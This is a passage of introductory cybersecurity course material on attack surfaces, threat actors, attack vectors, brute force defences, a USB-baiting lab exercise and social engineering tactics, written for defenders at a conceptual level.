another way for organizations to secure their systems. Security teams use these simulated attacks to get
a clearer picture of weaknesses in their defenses. There’s a growing need for specialized security
professionals in this field. Even if you start out assisting with these activities, there are plenty of opportunities to grow and learn the skills to be a pen tester.
Portfolio Activity: Analyze a vulnerable system for a small business
Scenario
Review the following scenario. Then complete the step-by-step instructions.
You are a newly hired cybersecurity analyst for an e-commerce company. The company
stores information on a remote database server since many of the employees work
remotely from locations all around the world. Employees of the company regularly query,
or request, data from the server to find potential customers. The database has been open to
the public since the company's launch three years ago. As a cybersecurity professional, you
recognize that keeping the database server open to the public is a serious vulnerability.
A vulnerability assessment of the situation can help you communicate the potential risks
with decision makers at the company. You must create a written report that clearly
explains how the vulnerable server is a risk to business operations and how it can be
secured.
*Ensure that each point is included in the final version of the portfolio
assessment before publishing for public view.
1.
Question 1
Your report provides a clear purpose for why the vulnerability assessment of the system is valuable to
the business.
2.
Question 2
In the risk assessment section of your report, do you consider potential threat sources of the vulnerable
database?
3.
Question 3
In the risk assessment section of your report, can each threat event reasonably be initiated by its related
threat sources?
4.
Question 4
Does the risk assessment table of your report contain likelihood, severity, and risk scores for each
potential threat source?
5.
Question 5
Your report explains the approach you took to analyze risk and provides a remediation strategy for
securing the vulnerable system.
Protect all entry points
There's a wide range of vulnerabilities in systems that need to be found. Assessing those
weaknesses is a time-consuming process. To position themselves ahead of threats and make the
most of their limited resources, companies start by understanding the environment surrounding
their operations. An important part of this is getting a sense of their attack surface. An attack
surface is all the potential vulnerabilities that a threat actor could exploit. Analyzing the attack
surface is usually the first thing security teams do. For example, imagine being part of
a security team of an old castle. Your team would need to decide how to allocate resources to
defenses. Giant walls, stone towers, and wooden gates are a few common security controls of these
structures. While these are all designed to protect the assets inside from attacks, they don't exactly
account for all the possibilities. What if the castle were near the ocean? If it were, these defenses
would be vulnerable to long range attacks by ship. A proper understanding of the attack surface
would mean your security team equipped the castle with catapults that could deal with these kinds
of threats. Modern organizations need to concern themselves with both a physical and digital attack
surface. The physical attack surface is made up of people and their devices. This surface can be
attacked from both inside and outside the organization, which makes it unique. For example, let's
consider an unattended laptop in a public space, like a coffee shop. The person responsible for it
walked away while sensitive company information was visible on the screen. This information is
vulnerable to external threats, like a business competitor, who can easily record the information
and exploit it. An internal threat of this attack surface, on the other hand, is often angry employees.
These employees might share an organization's private information on purpose. In general, the
physical attack surface should be filled with obstacles that deter attacks from happening. We call
this process security hardening. Security hardening is the process of strengthening a system to
reduce its vulnerabilities and attack surface. In other words, hardening is the act of minimizing the
attack surface by limiting its points of entry. We do this a lot in security because the smaller the
attack surface, the easier it is to protect. In fact, some security controls that we've explored
previously, like organization policies and access controls, are common ways that organizations
harden their physical attack surface. The digital attack surface is a bit tougher to harden. The digital
attack surface includes everything that's beyond our organization's firewall. In other words, it
includes anything that connects to an organization online. In the past, organizations stored their
data in a single location. This mainly consisted of servers that were managed on-site. Accessing the
information stored on those servers required connecting to the network the workplace managed.
These days, information is accessed outside of an organization's network because it's stored in the
cloud. Information can be accessed from anywhere in the world. A person can be in one part of the
world, fly to another place, and continue working. All while outside of their organization's network.
Cloud computing has essentially expanded the digital attack surface. Quicker access to information
is something we all benefit from, but it comes with a cost. Organizations of all sizes are under more
pressure to defend against threats coming from different entry points.
Approach cybersecurity with an attacker mindset
Cybersecurity is a continuously changing field. It's a fast-paced environment where new threats and
innovative technologies can disrupt your plans at a moment's notice. As a security professional, it’s up to
you to be prepared by anticipating change.
This all starts with identifying vulnerabilities. In a video, you learned about the importance of
vulnerability assessments, the internal review process of an organization's security systems. In this
reading, you will learn how you can use the findings of a vulnerability assessment proactively by
analyzing them from the perspective of an attacker.
Being prepared for anything
Having a plan should things go wrong is important. But how do you figure out what to plan for? In this
field, teams often conduct simulations of things that can go wrong as part of their vulnerability
management strategy. One way this is done is by applying an attacker mindset to the weaknesses they
discover.
Applying an attacker mindset is a lot like conducting an experiment. It's about causing problems in a
controlled environment and evaluating the outcome to gain insights. Adopting an attacker mindset is a
beneficial skill in security because it offers a different perspective about the challenges you're trying to
solve. The insights you gain can be valuable when it's time to establish a security plan or modify an
existing one.
Simulating threats
One method of applying an attacker mindset is using attack simulations. These activities are normally
performed in one of two ways: proactively and reactively. Both approaches share a common goal, which
is to make systems safer.
● Proactive simulations assume the role of an attacker by exploiting vulnerabilities and breaking through defenses. This is sometimes called a red team exercise.
● Reactive simulations assume the role of a defender responding to an attack. This is sometimes called a blue team exercise.
Each kind of simulation is a team effort that you might be involved with as an analyst.
Proactive teams tend to spend more time planning their attacks than performing them. If you find
yourself engaged in one of these exercises, your team will likely deploy a range of tactics. For example,
they might persuade staff into disclosing their login credentials using fictitious emails to evaluate
security awareness at the company.
On the other hand, reactive teams dedicate their efforts to gathering information about the assets
they're protecting. This is commonly done with the assistance of vulnerability scanning tools.
Scanning for trouble
You might recall that a vulnerability scanner is software that automatically compares existing common
vulnerabilities and exposures against the technologies on the network. Vulnerability scanners are
frequently used in the field. Security teams employ a variety of scanning techniques to uncover
weaknesses in their defenses. Reactive simulations often rely on the results of a scan to weigh the risks
and determine ways to remediate a problem.
For example, a team conducting a reactive simulation might perform an external vulnerability scan of
their network. The entire exercise might follow the steps you learned in a video about vulnerability
assessments:
● Identification: A vulnerable server is flagged because it's running an outdated operating system (OS).
● Vulnerability analysis: Research is done on the outdated OS and its vulnerabilities.
● Risk assessment: After doing your due diligence, the severity of each vulnerability is scored and the impact of not fixing it is evaluated.
● Remediation: Finally, the information that you’ve gathered can be used to address the issue.
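The assessment steps described above can be sketched as a small script. This is a minimal illustration, not a real scanner's output: the findings, the 1–3 scales, and the likelihood × severity scoring formula are all assumptions made for the example.

```python
# Hypothetical findings from an external vulnerability scan (identification step).
# Likelihood and severity use illustrative 1-3 scales.
findings = [
    {"asset": "web-server-01", "issue": "outdated OS", "likelihood": 3, "severity": 3},
    {"asset": "db-server-02", "issue": "weak TLS configuration", "likelihood": 2, "severity": 3},
]

def risk_score(finding):
    """Risk assessment step: score each finding as likelihood x severity."""
    return finding["likelihood"] * finding["severity"]

# Remediation step: address the highest-risk findings first.
for finding in sorted(findings, key=risk_score, reverse=True):
    print(f"{finding['asset']}: {finding['issue']} (risk score {risk_score(finding)})")
```

Scoring schemes vary between organizations; the point is that ranking findings by a consistent score helps prioritize remediation.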
During an activity like this, you’ll often produce a report of your findings. These can be brought to the
attention of service providers or your supervisors. Clearly communicating the results of these exercises
to others is an important skill to develop as a security professional.
Finding innovative solutions
Many security controls that you’ve learned about were created as a reactive response to risks. That’s
because criminals are continually looking for ways to bypass existing defenses. Effectively applying an
attacker mindset will require you to stay knowledgeable of security trends and emerging technologies.
Pro tip: Resources like NIST's National Vulnerability Database (NVD) can help you remain current on
common vulnerabilities.
Key takeaways
Vulnerability assessments are an important part of security risk planning. As an analyst, you’ll likely
participate in proactive and reactive simulations of these activities. Preparing yourself by researching
common vulnerabilities only goes so far. It’s equally important that you stay informed about new
technologies to be able to think with an innovative mindset.
Types of threat actors
Anticipating attacks is an important skill you’ll need to be an effective security professional. Developing
this skill requires you to have an open and flexible mindset about where attacks can come from.
Previously, you learned about attack surfaces, which are all the potential vulnerabilities that a threat
actor could exploit.
Networks, servers, devices, and staff are examples of attack surfaces that can be exploited. Security
teams of all sizes regularly find themselves defending these surfaces due to the expanding digital
landscape. The key to defending any of them is to limit access to them.
In this reading, you’ll learn more about threat actors and the types of risks they pose. You’ll also explore
the most common features of an attack surface that threat actors can exploit.
Threat actors
A threat actor is any person or group who presents a security risk. This broad definition refers to people
inside and outside an organization. It also includes individuals who intentionally pose a threat and those who accidentally put assets at risk. That’s a wide range of people!
Threat actors are normally divided into five categories based on their motivations:
● Competitors refers to rival companies who pose a threat because they might benefit from leaked information.
● State actors are government intelligence agencies.
● Criminal syndicates refer to organized groups of people who make money from criminal activity.
● Insider threats can be any individual who has or had authorized access to an organization’s resources. This includes employees who accidentally compromise assets or individuals who purposefully put them at risk for their own benefit.
● Shadow IT refers to individuals who use technologies that lack IT governance. A common example is when an employee uses their personal email to send work-related communications.
In the digital attack surface, these threat actors often gain unauthorized access by hacking into systems.
By definition, a hacker is any person who uses computers to gain access to computer systems, networks,
or data. Similar to the term threat actor, hacker is also an umbrella term. When used alone, the term fails
to capture a threat actor’s intentions.
Types of hackers
Because the formal definition of a hacker is broad, the term can be a bit ambiguous. In security, it applies
to three types of individuals based on their intent:
1. Unauthorized hackers
2. Authorized, or ethical, hackers
3. Semi-authorized hackers
An unauthorized hacker, or unethical hacker, is an individual who uses their programming skills to
commit crimes. Unauthorized hackers are also known as malicious hackers. Skill level ranges widely
among this category of hacker. For example, there are hackers with limited skills who can’t write their
own malicious software, sometimes called script kiddies. Unauthorized hackers like this carry out
attacks using pre-written code that they obtain from other, more skilled hackers.
Authorized, or ethical, hackers refer to individuals who use their programming skills to improve an
organization's overall security. These include internal members of a security team who are concerned
with testing and evaluating systems to secure the attack surface. They also include external security
vendors and freelance hackers that some companies incentivize to find and report vulnerabilities, a
practice called bug bounty programs.
Semi-authorized hackers typically refer to individuals who might violate ethical standards, but are not
considered malicious. For example, a hacktivist is a person who might use their skills to achieve a
political goal. One might exploit security vulnerabilities of a public utility company to spread awareness
of their existence. The intentions of these types of threat actors are often to expose security risks that should be addressed before a malicious hacker finds them.
Advanced persistent threats
Many malicious hackers find their way into a system, cause trouble, and then leave. But on some
occasions, threat actors stick around. These kinds of events are known as advanced persistent threats,
or APTs.
An advanced persistent threat (APT) refers to instances when a threat actor maintains unauthorized
access to a system for an extended period of time. The term is mostly associated with nation states and
state-sponsored actors. Typically, an APT is concerned with surveilling a target to gather information.
They then use the intel to manipulate government, defense, financial, and telecom services.
Just because the term is associated with state actors does not mean that private businesses are safe from
APTs. These kinds of threat actors are stealthy because hacking into another government agency or
utility is costly and time consuming. APTs will often target private organizations first as a step towards
gaining access to larger entities.
Access points
Each threat actor has a unique motivation for targeting an organization's assets. Keeping them out takes
more than knowing their intentions and capabilities. It’s also important to recognize the types of attack
vectors they’ll use.
For the most part, threat actors gain access through one of these attack vector categories:
● Direct access, referring to instances when they have physical access to a system
● Removable media, which includes portable hardware, like USB flash drives
● Social media platforms that are used for communication and content sharing
● Email, including both personal and business accounts
● Wireless networks on premises
● Cloud services usually provided by third-party organizations
● Supply chains like third-party vendors that can present a backdoor into systems
Any of these attack vectors can provide access to a system. Recognizing a threat actor’s intentions can
help you determine which access points they might target and what ultimate goals they could have. For
example, remote workers are more likely to present a threat via email than a direct access threat.
Key takeaways
Defending an attack surface starts with thinking like a threat actor. As a security professional, it’s
important to understand why someone would pose a threat to organizational assets. This includes
recognizing that every threat actor isn’t intentionally out to cause harm.
It’s equally important to recognize the ways in which a threat actor might gain access to a system.
Matching intentions with attack vectors is an invaluable skill as you continue to develop an attacker
mindset.
Pathways through Defense
To defend against attacks, organizations need to have more than just the understanding of the
growing digital landscape around them. Positioning themselves ahead
of a cyber threat also takes understanding the type of attacks that can be used against them. Last
time, we began exploring how the cloud has expanded the digital attack surface that organizations
protect. As a result, cloud computing has led to an increase in the number of attack vectors available.
Attack vectors refer to the pathways attackers use to penetrate security defenses. Like the doors and
windows of a home, these pathways are the exploitable features of an attack surface. One example of
an attack vector would be social media. Another would be removable media, like a USB drive. Most
people outside of security assume that cyber criminals are the only ones out there exploiting attack
vectors. While attack vectors are used by malicious hackers to steal information, other groups use
them too. For example, employees occasionally exploit attack vectors unintentionally. This happens
a lot with social media platforms. Sometimes, employees post sensitive company news that shouldn't
have been shared. At times, this same kind of thing happens on purpose. Social media platforms are
also vectors that disgruntled employees use to intentionally share confidential information that can
harm the company. We all treat attack vectors as critical risks to asset security. Attackers typically
put forth a lot of effort planning their attacks before carrying them out. It's up to us as security
professionals to put an even greater amount of effort into stopping them. Security teams do this by
thinking of each vector with an attacker mindset. This starts with a simple question: "How would we
exploit this vector?" We then go through a step-by-step process to answer our question. First, when
practicing an attacker mindset, we identify a target. This could be specific information, a system, a
person, a group, or the organization itself. Next, we determine how the target can be accessed. What
information is available that an attacker might take advantage of to reach the target? Based on that
information, the third step is to evaluate the attack vectors that can be exploited to gain entry. And
finally, we find the tools and methods of attack. What will the attackers use to carry this out? Along
the way, practicing an attacker mindset provides valuable insight into the best security controls to
implement and the vulnerabilities that need to be monitored. Every organization has a long list of
attack vectors to defend. While there are a lot of ways to protect them, there are a few common rules
for doing this. One key to defending attack vectors is educating users about security vulnerabilities.
These efforts are usually tied to an event. For example, advising them about a new phishing exploit
that is targeting users in the organization. Another rule is applying the principle of least privilege.
We've explored least privilege earlier in this section. It's the idea that access rights should be limited
to what's required to perform a task. Like we previously explored, this practice closes multiple
security holes inside an organization's attack surface. Next, using the right security controls and tools
can go a long way towards defending attack vectors. Even the most knowledgeable employees make
security mistakes, like accidentally clicking on a malicious link in an email. Having the right security
tools in place, like antivirus software, helps to defend attack vectors more efficiently and reduce the
risk of human error. Finally, there's building a diverse security team. This is one of the best ways to reduce
the risk of attack vectors and prevent future attacks. Your own unique perspective can greatly
improve the security team's ability to apply an attacker's mindset and stay one step ahead of potential
threats.
Activity Overview
Now that you've been introduced to attack surfaces and attack vectors, you can pause for a moment and
think about what you are learning. In this self-reflection, you will think about how these factors can help
identify threats and respond to brief questions.
You have learned many skills and concepts in this course. Completing this self-reflection will help you
understand how you might use what you’ve learned for different tasks and roles in the security field.
Answering and asking questions in this self-reflection will help to reinforce what you’ve learned, so it
will be easier for you to remember it later.
Review the steps of applying an attacker mindset
Previously, you learned that applying an attacker mindset to any situation starts by asking yourself,
“How would I exploit this vector?” This will require you to consider two elements: the attack surface and
its attack vectors.
Remember, an attack surface includes all the potential vulnerabilities that a threat actor could exploit.
An attack vector is the pathway that an attacker uses to penetrate security defenses of an attack surface.
After considering these elements, you can then go through a step-by-step process to apply an attacker
mindset:
● Identify a target
● Determine how the target can be accessed
● Evaluate attack vectors that can be exploited
● Find the tools and methods of attack
For a refresher on the elements of an attacker mindset, you can review the video on attack vectors and
the video on attack surfaces.
Fortify against brute force cyber attacks
Usernames and passwords are one of the most common and important security controls in
use today. They’re like the door lock that organizations use to restrict access to their
networks, services, and data. But a major issue with relying on login credentials as a critical
line of defense is that they’re vulnerable to being stolen and guessed by attackers.
In a video, you learned that brute force attacks are a trial-and-error process of discovering
private information. In this reading, you’ll learn about the many tactics and tools used by
threat actors to perform brute force attacks. You’ll also learn prevention strategies that
organizations can use to defend against them.
A matter of trial and error
One way of opening a closed lock is trying as many combinations as possible. Threat actors
sometimes use similar tactics to gain access to an application or a network.
Attackers use a variety of tactics to find their way into a system:
● Simple brute force attacks are an approach in which attackers guess a user's login credentials. They might do this by entering any combination of username and password that they can think of until they find the one that works.
● Dictionary attacks are a similar technique, except in these instances attackers use a list of commonly used credentials to access a system. This list is similar to matching a definition to a word in a dictionary.
● Reverse brute force attacks are similar to dictionary attacks, except they start with a single credential and try it in various systems until a match is found.
● Credential stuffing is a tactic in which attackers use stolen login credentials from previous data breaches to access user accounts at another organization. A specialized type of credential stuffing is called pass the hash. These attacks reuse stolen, unsalted hashed credentials to trick an authentication system into creating a new authenticated user session on the network.
Note: Besides access credentials, encrypted information can sometimes be brute forced
using a technique known as exhaustive key search.
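To make the dictionary attack tactic concrete, here is a minimal defensive-testing sketch of the idea. The wordlist and the target hash are made up for illustration; real attacks use far larger lists, and the example assumes the stolen hash is unsalted SHA-256.

```python
import hashlib

# Illustrative list of commonly used credentials (real lists contain millions).
wordlist = ["123456", "password", "letmein", "qwerty"]

# Hypothetical stolen, unsalted hash that the attacker wants to reverse.
target_hash = hashlib.sha256(b"letmein").hexdigest()

def dictionary_attack(target, candidates):
    """Hash each candidate and compare it against the stolen, unsalted hash."""
    for word in candidates:
        if hashlib.sha256(word.encode()).hexdigest() == target:
            return word
    return None

print(dictionary_attack(target_hash, wordlist))  # recovers "letmein"
```

Notice why salting defeats this: if each stored hash includes a unique random salt, a single precomputed wordlist of hashes no longer matches any of them.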
Each of these methods involves a lot of guesswork. Brute forcing your way into a system can be a tedious and time-consuming process—especially when it’s done manually. That’s why threat actors often use tools to conduct their attacks.
threat actors often use tools to conduct their attacks.
Tools of the trade
There are so many combinations that can be used to create a single set of login credentials.
The number of characters, letters, and numbers that can be mixed together is truly
incredible. When done manually, it could take someone years to try every possible
combination.
Instead of dedicating the time to do this, attackers often use software to do the guess work
for them. These are some common brute forcing tools:
● Aircrack-ng
● Hashcat
● John the Ripper
● Ophcrack
● THC Hydra
Sometimes, security professionals use these tools to test and analyze their own systems.
They each serve different purposes. For example, you might use Aircrack-ng to test a Wi-Fi network for vulnerabilities to brute force attacks.
Prevention measures
Organizations defend against brute force attacks with a combination of technical and
managerial controls. Each makes cracking defense systems through brute force less likely:
● Hashing and salting
● Multi-factor authentication (MFA)
● CAPTCHA
● Password policies
Technologies, like multi-factor authentication (MFA), reinforce each login attempt by
requiring a second or third form of identification. Other important tools are CAPTCHA and
effective password policies.
Hashing and salting
Hashing converts information into a unique value that can then be used to determine its
integrity. Salting is an additional safeguard that’s used to strengthen hash functions. It
works by adding random characters to data, like passwords. This increases the length and
complexity of hash values, making them harder to brute force and less susceptible to
dictionary attacks.
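A minimal sketch of salted hashing using Python's standard library. The specific choices here (PBKDF2 with SHA-256, 100,000 iterations, a 16-byte random salt) are reasonable illustrative parameters, not a prescribed standard.

```python
import hashlib
import os

def hash_password(password, salt=None):
    """Return (salt, hash). A fresh random salt makes identical passwords hash differently."""
    if salt is None:
        salt = os.urandom(16)  # the random characters added to the password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt, digest

def verify_password(password, salt, expected):
    """Re-hash the attempt with the stored salt and compare."""
    return hash_password(password, salt)[1] == expected

salt, stored = hash_password("Tr0ub4dor&3")
print(verify_password("Tr0ub4dor&3", salt, stored))  # True
print(verify_password("wrong-guess", salt, stored))  # False
```

Because each user gets a unique salt, two accounts with the same password produce different stored hashes, which is what makes precomputed dictionary attacks far less effective.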
Multi-factor authentication (MFA)
Multi-factor authentication (MFA) is a security measure that requires a user to verify their
identity in two or more ways to access a system or network. MFA is a layered approach to
protecting information. MFA limits the chances of brute force attacks because unauthorized
users are unlikely to meet each authentication requirement even if one credential becomes
compromised.
CAPTCHA
CAPTCHA stands for Completely Automated Public Turing test to tell Computers and
Humans Apart. It is known as a challenge-response authentication system. CAPTCHA asks
users to complete a simple test that proves they are human and not software that’s trying
to brute force a password.
There are two types of CAPTCHA tests. One scrambles and distorts a randomly generated
sequence of letters and/or numbers and asks users to enter them into a text box. The other
test asks users to match images to a randomly generated word. You’ve likely had to pass a
CAPTCHA test when accessing a web service that contains sensitive information, like an
online bank account.
Password policy
Organizations use these managerial controls to standardize good password practices
across their business. For example, one of these policies might require users to create
passwords that are at least 8 characters long and feature a letter, number, and symbol.
Other common requirements can include password lockout policies. For example, a
password lockout can limit the number of login attempts before access to an account is
suspended and require users to create new, unique passwords after a certain amount of
time.
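A lockout policy like the one described can be sketched as a simple counter. The five-attempt threshold and in-memory store are assumptions made for the example; real systems persist this state and typically add timed resets.

```python
# Illustrative threshold; organizations choose their own limits.
MAX_ATTEMPTS = 5
failed_attempts = {}  # username -> count of consecutive failed logins

def record_failed_login(username):
    """Increment the failure counter; return True if the account should be locked."""
    failed_attempts[username] = failed_attempts.get(username, 0) + 1
    return failed_attempts[username] >= MAX_ATTEMPTS

def record_successful_login(username):
    """Reset the counter on a successful login."""
    failed_attempts.pop(username, None)

for _ in range(MAX_ATTEMPTS):
    locked = record_failed_login("jdoe")
print(locked)  # True after the fifth consecutive failure
```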
The purpose of each of these requirements is to create more possible password
combinations. This lengthens the amount of time it takes an attacker to find one that will
work. The National Institute of Standards and Technology (NIST) Special Publication
800-63B provides detailed guidance that organizations can reference when creating their own
password policies.
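The example policy above (at least 8 characters with a letter, a number, and a symbol) can be expressed as a simple automated check. A minimal sketch; the function name and exact rules are just this example's, and real policy enforcement would also handle lockouts and expiration:

```python
import re

def meets_policy(password: str, min_length: int = 8) -> bool:
    """Check a password against the example policy:
    minimum length plus at least one letter, digit, and symbol."""
    return (
        len(password) >= min_length
        and re.search(r"[A-Za-z]", password) is not None      # at least one letter
        and re.search(r"\d", password) is not None            # at least one digit
        and re.search(r"[^A-Za-z0-9]", password) is not None  # at least one symbol
    )
```

Each added requirement multiplies the space of possible passwords an attacker must search.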
Key takeaways
Brute force attacks are simple yet reliable ways to gain unauthorized access to systems.
Generally, the stronger a password is, the more resilient it is to being cracked. As a security
professional, you might find yourself using the tools described above to test the security of
your organization's systems. Recognizing the tactics and tools used to conduct a brute force
attack is the first step towards stopping attackers.
Activity Overview
In this activity, you will assess the attack vectors of a USB drive. You will consider a scenario of finding a
USB drive in a parking lot from both the perspective of an attacker and a target.
USBs, or flash drives, are commonly used for storing and transporting data. However, some
characteristics of these small, convenient devices can also introduce security risks. Threat actors
frequently use USBs to deliver malicious software, damage other hardware, or even take control of
devices. USB baiting is an attack in which a threat actor strategically leaves a malware USB stick for an
employee to find and install to unknowingly infect a network. It relies on curious people to plug in an
unfamiliar flash drive that they find.
Scenario
Review the following scenario. Then complete the step-by-step instructions.
You are part of the security team at Rhetorical Hospital and arrive to work one morning. On the ground
of the parking lot, you find a USB stick with the hospital's logo printed on it. There’s no one else around
who might have dropped it, so you decide to pick it up out of curiosity.
You bring the USB drive back to your office where the team has virtualization software installed on a
workstation. Virtualization software can be used for this very purpose because it’s one of the only ways
to safely investigate an unfamiliar USB stick. The software works by running a simulated instance of the
computer on the same workstation. This simulation isn’t connected to other files or networks, so the
USB drive can’t affect other systems if it happens to be infected with malicious software.
Step-By-Step Instructions
Follow the instructions and answer the question below to complete the activity.
Step 1: Access the template
To use the template for this course item, click the link and select Use Template.
Link to template: Parking lot USB exercise
Step 2: Inspect the contents of the USB stick
You create a virtual environment and plug the USB drive into the workstation. The contents of the device
appear to belong to Jorge Bailey, the human resource manager at Rhetorical Hospital.
Jorge's drive contains a mix of personal and work-related files. For example, it contains folders that
appear to store family and pet photos. There is also a new hire letter and an employee shift schedule.
Review the types of information that Jorge has stored on this device. Then, in the Contents row of the
activity template, write 2-3 sentences (40-60 words) about the type of information that's stored on the
USB drive.
Note: USB drives often contain an assortment of personally identifiable information (PII). Attackers can
easily use this sensitive information to target the data owner or others around them.
Step 3: Apply an attacker mindset to the contents of the USB drive
The flash drive appears to contain a mixture of personal and work-related files. Consider how an
attacker might use this information if they obtained it. Also, consider whether this whole event was
staged.
For example, an attacker could have placed these files on the USB drive as a distraction. They might have
targeted Jorge or someone he knows, hoping they would find the device and plug it into their
workstation. In doing so, the attacker could establish a backdoor into the company's systems while the
unsuspecting target browsed through the files.
In the Attacker mindset row of the activity template, write 2-3 sentences (40-60 words) about how this
information could be used against Jorge or the hospital.
Pro tip: The Cybersecurity and Infrastructure Security Agency (CISA) provides some security tips on
using caution with USB drives, including keeping personal and business drives separate.
Step 4: Analyze the risks of finding a parking lot USB
You have not opened any of the files on the device, which is best practice.
Attackers sometimes conduct USB baiting attacks to deliver malicious code that they've crafted.
However, this USB drive was still a security risk even though it did not contain malicious code. It could
have easily been found by an attacker who might have used its contents to plan a variety of attacks.
Consider some of the risks associated with USB baiting attacks:
● What types of malicious software could be hidden on these devices? What could have happened
if the device were infected and discovered by another employee?
● What sensitive information could a threat actor find on a device like this?
● How might that information be used against an individual or an organization?
In the Risk analysis row of the activity template, write 3 or 4 sentences (60-80 words) describing any
technical, operational, or managerial controls that could mitigate USB baiting attacks.
What to Include in Your Response
Be sure to address the following criteria in your completed activity:
● 2-3 sentences about the types of information stored on the USB drive
● 2-3 sentences about how the information could be used against the owner and/or organization
● 3-4 sentences analyzing the risks of USB baiting attacks
Glossary terms from module 3
Terms and definitions from Course 5, Module 3
● Advanced persistent threat (APT): An instance when a threat actor maintains
unauthorized access to a system for an extended period of time
● Attack surface: All the potential vulnerabilities that a threat actor could exploit
● Attack tree: A diagram that maps threats to assets
● Attack vector: The pathways attackers use to penetrate security defenses
● Bug bounty: Programs that encourage freelance hackers to find and report
vulnerabilities
● Common Vulnerabilities and Exposures (CVE®) list: An openly accessible dictionary
of known vulnerabilities and exposures
● Common Vulnerability Scoring System (CVSS): A measurement system that scores
the severity of a vulnerability
● CVE Numbering Authority (CNA): An organization that volunteers to analyze and
distribute information on eligible CVEs
● Defense in depth: A layered approach to vulnerability management that reduces risk
● Exploit: A way of taking advantage of a vulnerability
● Exposure: A mistake that can be exploited by a threat
● Hacker: Any person who uses computers to gain access to computer systems,
networks, or data
● MITRE: A collection of non-profit research and development centers
● Security hardening: The process of strengthening a system to reduce its
vulnerability and attack surface
● Threat actor: Any person or group who presents a security risk
● Vulnerability: A weakness that can be exploited by a threat
● Vulnerability assessment: The internal review process of a company’s security
systems
● Vulnerability management: The process of finding and patching vulnerabilities
● Vulnerability scanner: Software that automatically compares existing common
vulnerabilities and exposures against the technologies on the network
● Zero-day: An exploit that was previously unknown
The Criminal Art of Persuasion
When you hear the word "cybercriminal", what comes to mind? You may imagine a hacker hunched
over a computer in a dark room. If this is what came to mind, you're not alone. In fact, this is what
most people outside of security think of. But online criminals aren't always that different from
those operating in the real world. Malicious hackers are just one type of online criminal. They are a
specific kind that relies on sophisticated computer programming skills to pull off their attacks.
There are other ways to commit crimes that don't require programming skills. Sometimes,
criminals rely on a more traditional approach: manipulation. Social engineering is a manipulation
technique that exploits human error to gain private information,
access, or valuables. These tactics trick people into breaking normal security procedures
on the attacker's behalf. This can lead to data exposures, widespread malware infections, or
unauthorized access to restricted systems. Social engineering attacks can happen anywhere. They
happen online, in-person, and through other interactions. Threat actors use many different tactics
to carry out their attacks. Some attacks can take a matter of seconds to perform. For example,
someone impersonating tech support asks an employee for their password to fix their computer.
Other attacks can take months or longer, such as threat actors monitoring an employee's social
media. The employee might post a comment saying they've gotten a temporary position in a new
role at the company. An attacker might use an opportunity like this to target the temporary worker,
who is likely to be less knowledgeable about security procedures. Regardless of the timeframe,
knowing what to look for can help you quickly identify and stop an attack in its tracks. There are
multiple stages of social engineering attacks. The first is usually to prepare. At this stage, attackers
gather information about their target. Using the intel, they'll determine the best way to exploit
them. In the next stage, attackers establish trust. This is often referred to as pretexting. Here,
attackers use the information they gathered earlier to open a line of communication. They'll
typically disguise themselves to trick their target into a false sense of trust. After that, attackers use
persuasion tactics. This stage is where the earlier preparation really matters. This is when the
attacker manipulates their target into volunteering information. Sometimes they do this by using
specific vocabulary that makes them sound like a member of the organization. The final stage of the
process is to disconnect from the target. After they collect the information they want, attackers
break communication with their target. They disappear to cover their tracks. Criminals who use
social engineering are stealthy. The digital world has expanded their capabilities. It's also created
more ways for them to go unnoticed. Still, there are ways that we can prevent their attacks.
Implementing managerial controls like policies, standards, and procedures is one of the first lines
of defense. For example, businesses often follow the patch management standard defined in NIST
Special Publication 800-40. These standards are used to create procedures for updating operating
systems, applications, and firmware that can be exploited. Staying informed of trends is also a
major priority for any security professional. An even better defense against social engineering
attacks is sharing what you know with others. Attackers play on our natural curiosity and desire to
help one another. Their hope is that targets won't think too hard about what's going on. Teaching
the signs of attack to others goes a long way towards preventing threats. Social engineering is a
threat to the assets and privacy of both individuals and organizations. Malicious attackers use a
variety of tactics to confuse and manipulate their targets.
Social engineering tactics
Social engineering attacks are a popular choice among threat actors. That’s because it’s
often easier to trick people into providing them with access, information, or money than it
is to exploit a software or network vulnerability.
As you might recall, social engineering is a manipulation technique that exploits human
error to gain private information, access, or valuables. It's an umbrella term that can apply
to a broad range of attacks. Each technique is designed to capitalize on the trusting nature
of people and their willingness to help. In this reading, you will learn about specific social
engineering tactics to watch out for. You’ll also learn ways that organizations counter these
threats.
Social engineering risks
Social engineering is a form of deception that takes advantage of the way people think. It
preys on people’s natural feelings of curiosity, generosity, and excitement. Threat actors
turn those feelings against their targets by affecting their better judgment. Social
engineering attacks can be incredibly harmful because of how easy they can be to
accomplish.
One of the highest-profile social engineering attacks that occurred in recent years was the
Twitter Hack of 2020. During that incident, a group of hackers made phone calls to Twitter
employees pretending to be from the IT department. Using this basic scam, the group
managed to gain access to the organization’s network and internal tools. This allowed them
to take over the accounts of high-profile users, including politicians, celebrities, and
entrepreneurs.
Attacks like this are just one example of the chaos threat actors can create using basic
social engineering techniques. These attacks present serious risks because they don’t
require sophisticated computer skills to perform. Defending against them requires a multi-layered approach that combines technological controls with user awareness.
Signs of an attack
Oftentimes, people are unable to tell that an attack is happening until it's too late. Social
engineering is such a dangerous threat because it typically allows attackers to bypass
technological defenses that are in their way. Although these threats are difficult to prevent,
recognizing the signs of social engineering is a key to reducing the likelihood of a successful
attack.
These are common types of social engineering to watch out for:
● Baiting is a social engineering tactic that tempts people into compromising their
security. A common example is USB baiting that relies on someone finding an
infected USB drive and plugging it into their device.
● Phishing is the use of digital communications to trick people into revealing sensitive
data or deploying malicious software. It is one of the most common forms of social
engineering, typically performed via email.
● Quid pro quo is a type of baiting used to trick someone into believing that they’ll be
rewarded in return for sharing access, information, or money. For example, an
attacker might impersonate a loan officer at a bank and call customers offering them
a lower interest rate on their credit card. They'll tell the customers that they simply
need to provide their account details to claim the deal.
● Tailgating is a social engineering tactic in which unauthorized people follow an
authorized person into a restricted area. This technique is also sometimes referred
to as piggybacking.
● Watering hole is a type of attack when a threat actor compromises a website
frequently visited by a specific group of users. Oftentimes, these watering hole sites
are infected with malicious software. An example is the Holy Water attack of 2020
that infected various religious, charity, and volunteer websites.
Attackers might use any of these techniques to gain unauthorized access to an organization.
Everyone is vulnerable to them, from entry-level employees to senior executives. However,
you can reduce the risks of social engineering attacks at any business by teaching others
what to expect.
Encouraging caution
Spreading awareness usually starts with comprehensive security training. When it comes
to social engineering, there are three main areas to focus on when teaching others:
● Stay alert to suspicious communications and unknown people, especially when it
comes to email. For example, look out for spelling errors and double-check the
sender's name and email address.
